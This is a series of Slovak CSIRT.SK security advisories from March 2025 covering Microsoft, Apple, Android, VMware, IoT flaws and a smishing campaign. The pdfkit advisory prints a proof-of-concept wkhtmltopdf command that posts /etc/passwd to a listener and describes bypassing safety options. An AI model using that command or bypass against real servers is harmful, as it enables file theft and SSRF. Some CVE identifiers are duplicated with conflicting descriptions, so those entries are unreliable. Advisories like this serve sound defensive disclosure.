Windows 11 Version 23H2 for x64-based Systems
Windows 11 Version 24H2 for ARM64-based Systems
Windows 11 Version 24H2 for x64-based Systems
Windows App Client for Windows Desktop
Windows Server 2008 R2 for x64-based Systems Service Pack 1
Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
Windows Server 2008 for 32-bit Systems Service Pack 2
Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)
Windows Server 2008 for x64-based Systems Service Pack 2
Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)
Windows Server 2012
Windows Server 2012 (Server Core installation)
Windows Server 2012 R2
Windows Server 2012 R2 (Server Core installation)
Windows Server 2016
Windows Server 2016 (Server Core installation)
Windows Server 2019
Windows Server 2019 (Server Core installation)
Windows Server 2022
Windows Server 2022 (Server Core installation)
Windows Server 2022, 23H2 Edition (Server Core installation)
Windows Server 2025
Windows Server 2025 (Server Core installation)

Opis činnosti:

I. Kritické zraniteľnosti:

CVE-2025-24053 (CVSS skóre 7,2)

Zraniteľnosť v produkte Microsoft Dataverse spočíva v nesprávnej autorizácii a vzdialený autentifikovaný útočník by ju mohol zneužiť na eskaláciu privilégií. Zraniteľnosť bola automaticky opravená spoločnosťou Microsoft a nevyžaduje dodatočnú aktualizáciu systémov.

CVE-2025-24035, CVE-2025-24045 (CVSS skóre 8,1)

Windows Remote Desktop Services obsahuje zraniteľnosti spočívajúce v ukladaní citlivých údajov v nesprávne uzamknutej pamäti. Vzdialený neautentifikovaný útočník by ich mohol zneužiť na vzdialené vykonanie kódu. Úspešné zneužitie zraniteľnosti vyžaduje, aby útočník vyhral súbeh procesov.

CVE-2025-26645 (CVSS skóre 8,8)

Zraniteľnosť v komponente Remote Desktop Client spočíva v nesprávnom riadení prístupu a možno ju zneužiť na vzdialené vykonanie kódu. Zneužitie zraniteľnosti vyžaduje interakciu zo strany používateľa s oprávneniami administrátora, ktorý sa musí pripojiť na RDP server pod kontrolou útočníka.

CVE-2025-24084 (CVSS skóre 8,4)

Dereferenciu nedôveryhodných ukazovateľov v rámci komponentu Windows Subsystem for Linux (WSL2) Kernel by vzdialený neautentifikovaný útočník mohol zneužiť na vzdialené vykonanie kódu zaslaním špeciálne vytvoreného odkazu v rámci e-mailovej správy alebo inej komunikačnej platformy. Zraniteľnosť možno za bližšie nešpecifikovaných podmienok zneužiť len doručením e-mailu a bez interakcie zo strany používateľa.

CVE-2025-24057 (CVSS skóre 7,8)

Kritická zraniteľnosť v Microsoft Office spočíva v pretečení medzipamäte haldy a vzdialený neautentifikovaný útočník by ju podvrhnutím špeciálne vytvorených súborov mohol zneužiť na vzdialené vykonanie kódu. Zneužitie zraniteľnosti vyžaduje interakciu zo strany používateľa, ktorý musí stiahnuť a otvoriť špeciálne vytvorený súbor.

CVE-2025-24057 (CVSS skóre 7,8)

Použitie odalokovaného miesta v pamäti v rámci Windows Domain Name Service by vzdialený neautentifikovaný útočník zaslaním presne načasovanej dynamickej DNS Update správy mohol zneužiť na vzdialené vykonanie kódu. Zneužitie zraniteľnosti vyžaduje, aby útočník vyhral súbeh procesov.

II. Aktívne zneužívané zraniteľnosti:

CVE-2025-24983 (CVSS skóre 7,0)

Použitie odalokovaného miesta v pamäti v rámci Windows Win32 Kernel Subsystem by lokálny autentifikovaný útočník mohol zneužiť na eskaláciu privilégií na úroveň oprávnení SYSTEM. Zneužitie zraniteľnosti vyžaduje, aby útočník vyhral súbeh procesov.

Pozn.: Podľa spoločnosti ESET je predmetná zraniteľnosť aktívne zneužívaná útočníkmi na šírenie malvéru PIPEMAGIC minimálne od marca 2023.

CVE-2025-24983 (CVSS skóre 7,0)

Nesprávnu neutralizáciu v rámci Microsoft Management Console by vzdialený neautentifikovaný útočník mohol zneužiť na obídenie bezpečnostných mechanizmov. Zneužitie zraniteľnosti vyžaduje interakciu zo strany používateľa, ktorý musí otvoriť špeciálne vytvorený súbor.

CVE-2025-24984 (CVSS skóre 4,6)

Prítomnosť citlivých údajov v logoch Windows NTFS by útočník s fyzickým prístupom k zariadeniu mohol zneužiť na získanie neoprávneného prístupu k citlivým údajom. Zneužitie zraniteľnosti vyžaduje fyzický prístup k zariadeniu umožňujúci pripojenie USB kľúča.

CVE-2025-24991 (CVSS skóre 5,5); CVE-2025-24993 (CVSS skóre 7,8)

Zraniteľnosti spočívajúce v čítaní mimo povolených hodnôt (CVE-2025-24991) a pretečení medzipamäte haldy (CVE-2025-24993) v rámci komponentu Windows NTFS by vzdialený útočník mohol zneužiť na získanie neoprávneného prístupu k citlivým údajom alebo vzdialené vykonanie kódu. Zneužitie zraniteľnosti vyžaduje interakciu zo strany používateľa, ktorý musí pripojiť špeciálne vytvorený VHD disk.

CVE-2025-24985 (CVSS skóre 7,8)

Windows Fast FAT File System Driver obsahuje zraniteľnosť spočívajúcu v pretečení celočíselnej premennej a medzipamäte haldy a možno ju zneužiť na vzdialené vykonanie kódu. Zneužitie zraniteľnosti vyžaduje interakciu zo strany používateľa, ktorý musí pripojiť špeciálne vytvorený VHD disk.

Uvedené zraniteľnosti sú v súčasnosti aktívne zneužívané útočníkmi.

III. Ostatné významné zraniteľnosti:

17 vysoko závažných zraniteľností v produktoch Microsoft Office (CVE-2025-24080, CVE-2025-24083, CVE-2025-26629), Microsoft Excel (CVE-2025-24075, CVE-2025-24081, CVE-2025-24082), Microsoft Word (CVE-2025-24077, CVE-2025-24078, CVE-2025-24079), Microsoft Access (CVE-2025-26630), Azure Promptflow (CVE-2025-24986) a komponentoch Windows exFAT File System (CVE-2025-21180), WinDbg (CVE-2025-24043), Windows Routing and Remote Access Service (RRAS) (CVE-2025-24051), Windows Telephony Service (CVE-2025-24056), Windows Fast FAT File System Driver (CVE-2025-24985), Windows NTFS (CVE-2025-24993) možno zneužiť na vzdialené vykonanie kódu.

Možné škody:

Vzdialené vykonanie kódu
Eskalácia privilégií
Neoprávnený prístup k citlivým údajom
Zneprístupnenie služby
Obídenie bezpečnostného prvku
Spoofing

Odporúčania:

Bezodkladné nasadenie februárového balíka opráv na zraniteľné produkty spoločnosti Microsoft. Bližšie informácie nájdete tu.

Zdroje:

Kritická zraniteľnosť v priemyselných switchoch Moxa

Marian Danko — Wed, 19 Mar 2025 15:43:24 +0000

Spoločnosť Moxa vydala bezpečnostné aktualizácie, ktoré opravujú kritickú zraniteľnosť v priemyselných switchoch série PT a EDS-508A. CVE-2024-12297 by vzdialený útočník mohol zneužiť na realizáciu útokov na báze brute-force a MD5 kolízií, obídenie mechanizmov autentifikácie a získanie neoprávneného prístupu do systému.

Zraniteľné systémy:

PT-508 Series s firmwarom vo verziách starších ako 3.8 (vrátane)
PT-510 Series s firmwarom vo verziách starších ako 3.8 (vrátane)
PT-7528 Series s firmwarom vo verziách starších ako 5.0 (vrátane)
PT-7728 Series s firmwarom vo verziách starších ako 3.9 (vrátane)
PT-7828 Series s firmwarom vo verziách starších ako 4.0 (vrátane)
PT-G503 Series s firmwarom vo verziách starších ako 5.3 (vrátane)
PT-G510 Series s firmwarom vo verziách starších ako 6.5 (vrátane)
PT-G7728 Series s firmwarom vo verziách starších ako 6.5 (vrátane)
PT-G7828 Series s firmwarom vo verziách starších ako 6.5 (vrátane)
EDS-508A Series s firmwarom vo verziách starších ako 3.11 (vrátane)

Opis zraniteľnosti:

CVE-2024-12297 (CVSS 4.0 skóre: 9.2)

Zraniteľnosť s označením CVE-2024-12297 spočíva v prítomnosti bližšie nešpecifikovaných chýb v autorizačnom mechanizme a vzdialený neautentifikovaný útočník by ju mohol zneužiť na obídenie mechanizmov autentifikácie a získanie neoprávneného prístupu do systému. Podľa výrobcu zraniteľnosť umožňuje realizáciu útokov typu brute-force a útokov založených na hľadaní MD5 kolízií, prostredníctvom ktorých možno získať platné prihlasovacie údaje alebo autentifikačné hashe.

Možné škody:

Obídenie bezpečnostného prvku
Neoprávnený prístup do systému
Neoprávnený prístup k citlivým údajom
Zneprístupnenie služby

Odporúčania:

Bezodkladná inštaláciu bezpečnostných záplat, ktoré je možné stiahnuť kontaktovaním technickej podpory spoločnosti Moxa.

Výrobca na zvýšenie celkovej úrovne bezpečnosti zariadení taktiež odporúča:

limitovať sieťový a vzdialený prístup k zariadeniam a systémom len na dôveryhodné IP adresy a siete
v rámci autentifikácie a riadenia prístupu nasadiť viacfaktorovú autentifikáciu a aplikovať princíp minimálnych privilégií
vykonávať pravidelnú aktualizáciu systémov, vrátane firmwaru
v infraštruktúre zaviesť centralizovaný zber logov a systémy pre monitoring podozrivej sieťovej aktivity

Zdroje:

Aktívne zneužívaná zero-day zraniteľnosť v operačných systémoch Apple

Marian Danko — Wed, 19 Mar 2025 15:41:18 +0000

Spoločnosť Apple vydala bezpečnostné aktualizácie na svoje operačné systémy iOS, iPadOS, macOS Sequoia, visionOS a webový prehliadač Safari, ktoré opravujú aktívne zneužívanú zero-day zraniteľnosť. Zraniteľnosť CVE-2025-24201 v komponente WebKit by útočník podvrhnutím špeciálne vytvoreného webového obsahu mohol zneužiť na únik z Web Content sandboxu a vzdialené vykonanie kódu.

Zraniteľné systémy:

Zariadenia s operačným systémom iOS vo verziách starších ako 18.3.2
Zariadenia s operačným systémom iPadOS vo verziách starších ako 18.3.2
Zariadenia s operačným systémom macOS Sequoia vo verziách starších ako 15.3.2
Zariadenia s operačným systémom visionOS vo verziách starších ako 2.3.2
Apple Safari vo verziách starších ako 18.3.1

Opis zraniteľnosti:

CVE-2025-24201 (CVSS skóre: 8.8)

Zraniteľnosť v komponente WebKit spočíva v možnosti zápisu do pamäte mimo povolených hodnôt a vzdialený neautentifikovaný útočník by ju podvrhnutím špeciálne vytvoreného webového obsahu mohol zneužiť na únik z Web Content sandboxu a vzdialené vykonanie kódu.

Spoločnosť Apple uviedla, že zraniteľnosť môže byť aktívne zneužívaná v rámci sofistikovaných útokov cielených na používateľov zariadení s iOS vo verziách starších ako 17.2.

Možné škody:

Obídenie bezpečnostného prvku
Vzdialené vykonanie kódu

Odporúčania:

Spoločnosť Apple odporúča bezodkladnú aktualizáciu operačných systémov iOS a iPadOS na verziu 18.3.2, macOS Sequoia na verziu 15.3.2, visionOS na verziu 2.3.2 a webový prehliadač Safari na verziu 18.3.1.

Zdroje:

Čipy Espressif ESP32 obsahujú nezdokumentované funkcie

Marian Danko — Wed, 19 Mar 2025 15:39:35 +0000

Bezpečnostní výskumníci zo spoločnosti Tarlogic zverejnili informácie o existencii nezdokumentovaných funkcií v čipoch ESP32, ktoré sú súčasťou veľkého množstva inteligentných a IoT (Internet of Things) zariadení po celom svete. CVE-2025-27840 by útočník s fyzickým prístupom mohol zneužiť na vykonanie neoprávnených zmien v systéme a získanie úplnej kontroly nad zariadeniami. Spoločnosť Espressif sa vyjadrila, že sa jedná o príkazy pre účely interného testovania a nie bezpečnostnú zraniteľnosť.

Zraniteľné systémy:

Systémy a zariadenia s čipmi Espressif ESP32

Pozn.: Pretože sú čipy ESP32 používané celosvetovo a poskytujú Bluetooth a WiFi konektivitu v rámci rôznych inteligentných a IoT zariadení, v súčasnosti neexistuje vyčerpávajúci zoznam zasiahnutých systémov.

Opis zraniteľnosti:

CVE-2025-27840 (CVSS 3.1 skóre: 6,8)

Čipy ESP32 obsahujú 29 nezdokumentovaných funkcií, súhrnne označených identifikátorom CVE-2025-27840. Útočník s fyzickým prístupom k zariadeniu a oprávneniami administrátora by ich mohol zneužiť na čítanie a modifikáciu obsahu RAM a Flash pamäte, spoofovanie MAC adries a injekciu LMP/LLCP paketov, čo môže mať za následok zneprístupnenie služby alebo získanie úplnej kontroly nad zariadením.

Podľa vyjadrenia výrobcu sa jedná o debugovacie príkazy, ktoré sú súčasťou jeho implementácie protokolu HCI (Host Controller Interface) používaného v technológii Bluetooth. Príkazy využíva v rámci interného testovania a plánuje ich odstrániť vydaním aktualizácie softvéru.

Možné škody:

Neoprávnená zmena v systéme
Získanie úplnej kontroly nad systémom
Zneprístupnenie služby

Odporúčania:

Pretože sú čipy ESP32 používané celosvetovo v rámci rôznych produktov a v súčasnosti neexistuje ich vyčerpávajúci zoznam, administrátorom a používateľom inteligentných a IoT zariadení odporúčame aplikovať všeobecne známe best practice postupy pre ich zabezpečenie. Mimoriadnu pozornosť treba venovať pravidelnej aktualizácii firmvéru a obmedzeniu prístupu k zariadeniam len na dôveryhodné IP adresy.

Zdroje:

Aktívne zneužívaná kritická zraniteľnosť v IP kamerách Edimax IC-7100

Marian Danko — Wed, 19 Mar 2025 15:35:59 +0000

Bezpečnostní výskumníci zverejnili informácie o aktívne zneužívanej kritickej zraniteľnosti v IP kamerách Edimax IC-7100 (produkt s ukončenou podporou). Zraniteľnosť s identifikátorom CVE-2025-1316 možno zneužiť na vzdialené vykonanie kódu s následkom úplného narušenia dôvernosti, integrity a dostupnosti systému.

Zraniteľné systémy:

IP kamery Edimax IC-7100 vo všetkých verziách (ukončená podpora)

Opis zraniteľnosti:

CVE-2025-1316 (CVSS 3.1 skóre: 9,8)

Kritická zraniteľnosť spočíva v nesprávnom ošetrení špeciálnych elementov v rámci požiadaviek a vzdialený autentifikovaný útočník by ju zaslaním špeciálne vytvorených požiadaviek na /camera-cgi/admin/param.cgi mohol zneužiť na injekciu príkazov operačného systému a následné vykonanie kódu.

Podľa bezpečnostných výskumníkov zo spoločnosti Akamai je zraniteľnosť aktívne zneužívaná minimálne od mája 2024. Útočníci kompromitované zariadenia zapájajú do rôznych botnetov, vrátane botnetov na báze Mirai.Experti z Akamai vo svojej analýze naznačili, že zraniteľné môžu byť ďalšie IoT (Internet of Things) zariadenia od spoločnosti Edimax.

Možné škody:

Vzdialené vykonanie kódu

Odporúčania:

Vzhľadom na to, že sa jedná o produkty s ukončenou technickou podporou, výrobca neplánuje vydať aktualizácie. Administrátorom a používateľom odporúčame prejsť na alternatívne produkty s platnou podporou. V prípade, že migrácia na iný produkt nie je možná, odporúčame limitovať prístup k zariadeniu len na dôveryhodné IP adresy.

Zdroje:

Google opravil 2 aktívne zneužívané zero-day zraniteľnosti operačného systému Android

Marian Danko — Wed, 19 Mar 2025 15:33:03 +0000

Spoločnosť Google vydala bezpečnostné aktualizácie pre svoj operačný systém Android, ktoré opravujú 44 zraniteľností, z čoho 10 je označených ako kritické a 2 ako aktívne zneužívané. CVE-2024-43093 v komponente Framework a CVE-2024-50302 v komponente HID USB možno zneužiť na získanie neoprávneného prístupu k citlivým údajom v systémových priečinkoch a kernel pamäti.

Zraniteľné systémy:

Zariadenia s operačným systémom Android bez aktualizácie z 05.03.2025

Opis zraniteľnosti:

Kritické zraniteľnosti:

Najzávažnejšie zraniteľnosti možno zneužiť na vzdialené vykonanie kódu (CVE-2025-0074, CVE-2025-0075, CVE-2025-0084, CVE-2025-22403, CVE-2025-22408, CVE-2025-22410, CVE-2025-22411, CVE-2025-22412), eskaláciu privilégií (CVE-2025-22409) a zneprístupnenie služby (CVE-2025-0081).

Aktívne zneužívané zraniteľnosti:

CVE-2024-43093 (CVSS 3.1 skóre: 7,8)

Zraniteľnosť nachádzajúcu sa v komponente Framework možno zneužiť na eskaláciu privilégií a získanie neoprávneného prístupu k obsahu systémových priečinkov Android/data, Android/obb a Android/sandbox.

CVE-2024-50302 (CVSS 3.1 skóre: 7,8)

Komponent HID, ktorého ovládač je súčasťou Linux kernelu, obsahuje zraniteľnosť, ktorú možno zneužiť na získanie neoprávneného prístupu k údajom zneužitím neinicializovanej pamäte kernelu.

Pozn.: Zraniteľnosti s označením CVE-2024-43093 a CVE-2024-50302 sú v súčasnosti aktívne zneužívané.

Na základe analýzy Amnesty International (ďalej len AI) bola zraniteľnosť CVE-2024-50302 údajne zneužívaná v rámci forenzných nástrojov Cellebrite, ktoré boli údajne v polovici roka 2024 zneužité srbskou vládou na odomknutie zariadenia Android aktivistu a pokuse o inštaláciu spyvéru. Podobná analýza AI z decembra 2024 taktiež upozorňovala na možné zneužitie nástrojov Cellebrite na odpočúvanie aktivistov a novinárov zo strany srbskej vlády. Spoločnosť Cellebrite sa špecializuje na vývoj špecializovaných produktov určených pre orgány činné v trestnom konaní, spravodajské služby a forenzných špecialistov. V nadväznosti na uvedené analýzy Cellebrite ukončila poskytovanie svojich služieb a produktov pre bližšie nešpecifikovaných zákazníkov v Srbsku.

Možné škody:

Vzdialené vykonanie kódu
Eskalácia privilégií
Získanie neoprávneného prístupu k citlivým údajom
Zneprístupnenie služby

Odporúčania:

Administrátorom a používateľom odporúčame vykonať bezodkladnú inštaláciu aktualizácií operačného systému Android z 5. marca 2025.

Zdroje:

Zraniteľnosť knižnice pdfkit pre Python

Marian Danko — Mon, 17 Mar 2025 15:59:34 +0000

Zhrnutie

Bezpečnostní analytici CSIRT.SK objavili zraniteľnosť CVE-2025-26240 v knižnici pdfkit v jazyku Python spočíva v metóde from_string, ktorá spracúva používateľské vstupy HTML, ktoré však neošetruje. Metóda from_string používa metaznačky, ktorých názvy začínajú na “pdfkit-“, a ich hodnoty konvertuje na parametre príkazového riadku pre nástroj wkhtmltopdf. Túto analýzu vstupov vykonáva metóda _find_options_in_meta, ktorá sa nachádza v súbore pdfkit/pdfkit.py. Hoci táto funkcia môže byť v určitých prípadoch užitočná (napríklad nastavenie veľkosti papiera), niektoré argumenty wkhtmltopdf predstavujú bezpečnostné riziko.

Jednoduchá ukážka zneužitia zraniteľnosti (POC)

Keď do metódy from_string vložíme nasledujúce údaje HTML, budeme môcť prečítať obsah súboru /etc/passwd.






LFI POC

Existuje niekoľko obmedzení týkajúcich sa argumentov odosielaných do wkhtmltopdf. Prvým je, že kľúč musí obsahovať dve pomlčky, čo je dôvod, prečo posledná metaznačka obsahuje vo svojom názve „–“. Implementáciu tejto kontroly možno nájsť v metóde _normalize_options, ktorá sa nachádza v súbore pdfkit/pdfkit.py.

for key, value in list(options.items()):
            if '--' not in key:
                normalized_key = '--%s' % self._normalize_arg(key)
            else:
                normalized_key = self._normalize_arg(key)

Kvôli nedostatočnej validácii môžeme odovzdávať argumenty, ktoré prijímajú viacero hodnôt, nielen dvojice kľúč-hodnota.

Keď metóde from_string odovzdáme skúšobný súbor HTML, vidíme, že príkaz vygenerovaný a vykonaný metódou subprocess.Popen vyzerá nasledovne:

['/usr/local/bin/wkhtmltopdf', '--quiet', '--enable-local-file-access', '--post-file', 'file--a', '/etc/passwd', 'http://127.0.0.1:8080/?lfi-test=--', '--cache-dir', '-', '-']

Z toho vyplýva nasledujúci príkaz:

/usr/local/bin/wkhtmltopdf –quiet --enable-local-file-access --post-file file--a /etc/passwd http://127.0.0.1:8888/?lfi-test=-- --cache-dir - -

Tento príkaz odošle obsah súboru /etc/passwd ako príponu v požiadavke POST na adresu http://127.0.0.1:8888/?lfi-test=– s parametrom file–a. Parameter –cache-dir sme pridali len preto, aby sme odstránili dodatočnú pomlčku, ktorú pridala knižnica pdfkit. Tým sa zabezpečí úspešné spustenie nástroja wkhtmltopdf.

Pri zneužití tejto zraniteľnosti môžeme pozorovať, že náš Python listener prijíma obsah súboru /etc/passwd.

Rovnako môžeme spustiť ľubovoľné skripty JavaScript pomocou parametra príkazového riadka –script, ktorý po vygenerovaní PDF spustí daný kód JavaScript, čo vedie k SSRF a ďalším potenciálnym zraniteľnostiam.

Obídenie bezpečnostných prvkov pdfkit

Knižnica pdfkit umožňuje vývojárom poskytnúť slovník volieb pre priame voľby, ktoré budú odovzdané nástroju wkhtmltopdf. Hlavným problémom je, že tieto voľby možno ľahko obísť vzhľadom na spôsob, akým Python pracuje so slovníkmi.

Inicializácia volieb je definovaná v súbore pdfkit/pdfkit.py nasledovne:

self.options = OrderedDict()
if self.source.isString():
        self.options.update(self._find_options_in_meta(url_or_file))
        self.environ = self.configuration.environ
        if options is not None:
                 self.options.update(options)

Hlavným problémom je, že Python pri použití metódy update zachováva poradie kľúčov. Napríklad, ak máme slovník {“a”: 10, “b”: 20} a zavoláme naň funkciu update s {“a”: 15}, výsledný slovník bude {“a”: 15, “b”: 20}.

Útočník môže vždy manipulovať s poradím argumentov príkazového riadka zasielaných wkhtmltopdf. Ak sa vývojár pokúsi vynútiť bezpečnostné voľby, ako napríklad {“disable-javascript”: “”, “disable-local-file-access”: “}, útočník môže najprv nastaviť tieto možnosti a potom ich obísť pridaním ich náprotivkov, t.j. “enable-javascript” alebo “enable-local-file-access“.

Dopad

Local File Inclusion (LFI) a únik údajov
Útočníci môžu využiť argument –post-file na získanie prístupu k citlivým súborom na serveri, ako je /etc/passwd. To môže viesť k neoprávnenému odhaleniu systémových informácií, čo môže útočníkovi pomôcť pri zvýšení oprávnení alebo ďalšom zneužití hostiteľského počítača.
Server-Side Request Forgery (SSRF)
Zneužitím parametrov príkazového riadka, ako –script, môže útočník vykonať neoprávnené požiadavky HTTP na interné alebo externé služby. To môže viesť k:
1. prístupu k interným zdrojom, ktoré by nemali byť verejne dostupné.
1. obchádzaniu bezpečnostných mechanizmov, ako sú firewally alebo rate limity pre API.
1. interakcia s metadátovými cloudovými službami s cieľom získať prihlasovacie údaje.

Najjednoduchšie riešenie pre vývojárov

Najjednoduchším riešením zraniteľnosti CVE-2025-26240 je pravdepodobne použitie iných metód ako from_string. Vývojár môže napríklad uložiť poskytnuté HTML do dočasného súboru a potom použiť metódu from_file, ktorá neanalyzuje metaznačky.

Zdroj:

https://vulmon.com/vulnerabilitydetails?qid=CVE-2025-26240&scoretype=vmscore

Broadcom odstránil aktívne zneužívané zraniteľnosti virtualizačnej platformy VMware

Marian Danko — Mon, 17 Mar 2025 15:38:08 +0000

Spoločnosť Broadcom vydala bezpečnostné aktualizácie na svoje virtualizačné platformy VMware ESXi, Workstation a Fusion ktoré opravujú 3 aktívne zneužívané zero-day zraniteľnosti, z čoho jedna je označená ako kritická.

Zraniteľné systémy:

VMware ESXi 8.0 bez aplikovanej záplaty ESXi80U3d-24585383
VMware ESXi 8.0 bez aplikovanej záplaty ESXi80U2d-24585300
VMware ESXi 7.0 bez aplikovanej záplaty ESXi70U3s-24585291
VMware Workstation 17.X vo verziách starších ako 17.6.3
VMware Fusion 13.X vo verziách starších ako 13.6.3

Pozn.:

Uvedené produkty sú súčasťou produktov Broadcom VMware Cloud Foundation, VMware Telco Cloud Platform a VMware Telco Cloud Infrastructure.

Opis zraniteľnosti:

Aktívne zneužívané zero-day zraniteľnosti:

CVE-2025-22224 (CVSS 3.1 skóre: 9,3)

Kritická zraniteľnosť typu TOCTOU (Time-of-Check Time-of-Use) umožňuje zápis do pamäte mimo povolených hodnôt v rámci VMware ESXi a Workstation. Lokálny útočník s oprávneniami administrátora na virtuálnom stroji by ju mohol zneužiť na vykonanie kódu v kontexte procesu VMX bežiaceho na hostiteľskom stroji.

CVE-2025-22225 (CVSS 3.1 skóre: 8,2)

Zraniteľnosť vo VMware ESXi by lokálny autentifikovaný útočník s právomocami administrátora v rámci procesu VMX mohol zneužiť na zápis do pamäte kernelu a únik zo sandboxového prostredia.

CVE-2025-22226 (CVSS 3.1 skóre: 7,1)

VMware ESXi, Workstation, and Fusion obsahujú zraniteľnosť umožňujúcu čítanie pamäte mimo povolených hodnôt v rámci HGFS (Host Guest File System). Lokálny útočník s oprávneniami administrátora na virtuálnom stroji by ju mohol zneužiť na získanie obsahu pamäte procesu VMX.

Podľa Microsoft Threat Intelligence Center sú zraniteľnosti aktívne zneužívané. Úspešné zneužitie všetkých uvedených zraniteľností vyžaduje administrátorský prístup k virtuálnym strojom. Zreťazením uvedených zraniteľností je možné dosiahnuť úplný únik z virtuálneho prostredia.

Možné škody:

Vykonanie kódu
Únik zo sandboxového prostredia
Neoprávnený prístup k citlivým údajom

Odporúčania:

Administrátorom a používateľom odporúčame vykonať v závislosti od používanej verzie VMware ESXi bezodkladnú inštaláciu záplat ESXi80U3d-24585383, ESXi80U2d-24585300 alebo ESXi70U3s-24585291 a aktualizáciu VMware Workstation na verziu 17.6.3 a VMware Fusion na verziu 13.6.3.

Pri aktualizácii ostatných závislých produktov postupujte podľa pokynov výrobcu zverejnených v rámci KB88287 (VMware Cloud Foundation) a KB389385 (VMwareTelco Cloud Platform, VMware Telco Cloud Infrastructure).

Zdroje:

Mesačná správa CSIRT.SK – február 2025

Marian Danko — Fri, 14 Mar 2025 13:06:33 +0000

V publikovanej správe sa zameriame na dianie v oblasti informačnej bezpečnosti vo svete a na Slovensku v mesiaci február 2025. Pridávame aj prehľad kritických zraniteľností produktov a nástrojov.

Mesačná správa – 02/2025 PDF (1 874 KB)

Mesačné správy CSIRT.SK sú spracovávané od augusta 2018 a sú dostupné v časti Mesačná správa CSIRT.SK a prehľad bezpečnostných udalostí vo svete a u nás.

„Smishingová triáda“ využíva nové techniky pri podvodoch

Marian Danko — Tue, 11 Mar 2025 16:42:32 +0000

Smishingové útoky predstavujú stále väčšiu hrozbu pre jednotlivcov ako aj organizácie na celom svete, vrátane Slovenska. Tieto podvody, pri ktorých útočníci zneužívajú SMS správy alebo moderné komunikačné platformy, ako sú iMessage a RCS (Rich Communication Services), s cieľom získať citlivé údaje, sú čoraz sofistikovanejšie.

V posledných dňoch bola na Slovensku zaznamenaná kampaň, pri ktorej sa útočníci vydávali za Všeobecnú zdravotnú poisťovňu (VšZP) s cieľom vylákať citlivé informácie. Možno ste už aj vy dostali SMS správu s odkazom na podvrhnutú webovú stránku, ako napríklad:

hXXps://obnovypoistenca[.]com (Fingerprint:a08f41efa3a9fd9cd98220234be4a7adb2f58cdd)
hXXps://informacie-poistenca[.]com (Fingerprint: 11a1bf8a43834cc674800d1a2a666bf173d9550e)

Obrázok 1 Vzorka podvodnej SMS správy

Obrázok 2 Klasifikácia kampane (Zdroj: Analýza JoeSandbox)

O čo ide útočníkom? Mechanizmus útoku a technické aspekty

Súčasné smishingové kampane sú prepracované a dobre organizované, kombinujú pokročilé sociálne inžinierstvo s phishingovými webmi a falošnými platobnými bránami. Po otvorení podvodnej webovej stránky, odkaz na ktorú nám prišiel SMS správou (obrázok č.1), vás formulár vyzve na vyplnenie osobných údajov, vrátane mena, priezviska, dátumu narodenia, adresy bydliska, telefónneho čísla a emailovej adresy (obrázok č.3).

Obrázok 3 Úvodné zobrazenie podvrhnutej stránky

Obrázok 4 Formulár pre vloženie údajov o platobnej karte

Obrázok 5 Formulár pre vloženie OTP

Po vyplnení týchto informácií sa vám zobrazí požiadavka na zadanie údajov o platobnej karte a neskôr aj žiadosť o zadanie druhého faktoru overenia formou OTP (jednorazový kód).

Takto útočníci získajú vaše osobné informácie, a zároveň údaje z platobnej karty. OTP kód, ktorý Vám po zadaní karty príde, slúži na jej pridanie do útočníkovej mobilnej peňaženky. Obeť si však túto skutočnosť nemusí v SMS správe s kódom všimnúť, na čo sa podvodníci spoliehajú.

Smishingová triáda a jej techniky

Hlavnou metódou finančného zisku čínskej útočnej skupiny pomenovanej „Smishingová triáda“ je tzv. carding – nezákonné získavanie, predaj a používanie odcudzených platobných údajov. Táto technika bola kedysi doménou ruských hackerov, ale v posledných rokoch sa kyberzločinecké skupiny v Číne prispôsobili novým bankovým technológiám a vyvinuli vlastné inovatívne metódy.

Jednou z najobľúbenejších metód Smishingovej triády je konverzia ukradnutých údajov na mobilné peňaženky (Apple Pay, Google Pay), ktoré umožňujú vykonávanie platieb online aj v bežných obchodoch (tap-to-pay). Po získaní údajov od obete prostredníctvom podvodnej stránky, útočníci pripoja bankovú kartu obete k platobnej aplikácii. Na základe nižšie uvedených techník dokážu následne vykonávať z tejto karty viacero transakcií po celom svete súčasne.

Podvodné webové stránky, ktoré slúžia pre zber platobných údajov od obetí, pravidelne menia IP adresy a využívajú hostingové spoločnosti po celom svete, čím sťažujú ich detekciu a blokovanie. Na tento účel často používajú služby tzv. bulletproof hostingov, ktoré ponúkajú anonymitu a odolnosť voči zásahom orgánov činných v trestnom konaní. Ďalej využívajú techniky ako fast-flux DNS, kde sa IP adresy rýchlo menia v krátkych intervaloch, alebo reverzné proxy servery na maskovanie svojej infraštruktúry.

Nové podvodné techniky a mechanizmus krádeže financií

Okrem tradičných podvodných techník útočníci začali využívať novú metódu, pri ktorej zneužívajú platobné plikácie Apple Pay, Google Pay. Získané informácie o platobných kartách obete a OTP (jednorazový kód), ktorý príde na jej zariadenie im umožňujú pridať platobnú kartu obete do svojej mobilnej peňaženky.

Pre zefektívnenie krádeže financií zo zneužitých kariet ďalej využijú metódu označovanú ako Ghost Tap. Funguje na princípe prenosu signálu pre NFC transakciu na viacero vzdialených zariadenia. Jednou z možností realizácie tohto útoku je škodlivá aplikácia ZNFC, ktorú má útočník nainštalovanú v telefóne s peňaženkou s ukradnutými kartami. Pomocou aplikácie pošle legitímny NFC signál cez internet zariadeniam svojich bielych koní, práve platiacich pri platobných termináloch v obchodoch na ľubovoľných miestach sveta. Takto môže vykonať viacero transakcií prakticky súčasne, čím dosiahne vyšší zisk z karty pred nahlásením krádeže a jej zablokovaním. Malvér ZNFC sa predáva na internete za 500 USD mesačne, pričom v cene je zahrnutá nepretržitá zákaznícka podpora, ktorá pomáha podvodníkom riešiť prípadné technické problémy.

Slovenské prepojenia a objavené hrozby

Dňa 12. februára 2025 CSIRT.SK identifikoval podozrivé domény zneužívajúce identitu Všeobecnej zdravotnej poisťovne. Jednou z týchto podvodných webových stránok bola hXXps://informacie-poistenca[.]com. Analýzou otvorených zdrojov sme zistili, že webová stránka bola hosťovaná na IP adrese 91.202.233.186, ktorá patrí do rozsahu ruskej spoločnosti PROSPERO OOO. Z analýzy vyplynulo, že táto spoločnosť hostuje viac ako 10 000 podozrivých domén.

Zdroj: https://urlscan.io/search/#page.asn:%22AS200593%22

Obrázok 6 Reverzná pasívna DNS analýza IP adresy 91.202.233.186 (Zdroj: VirusTotal)

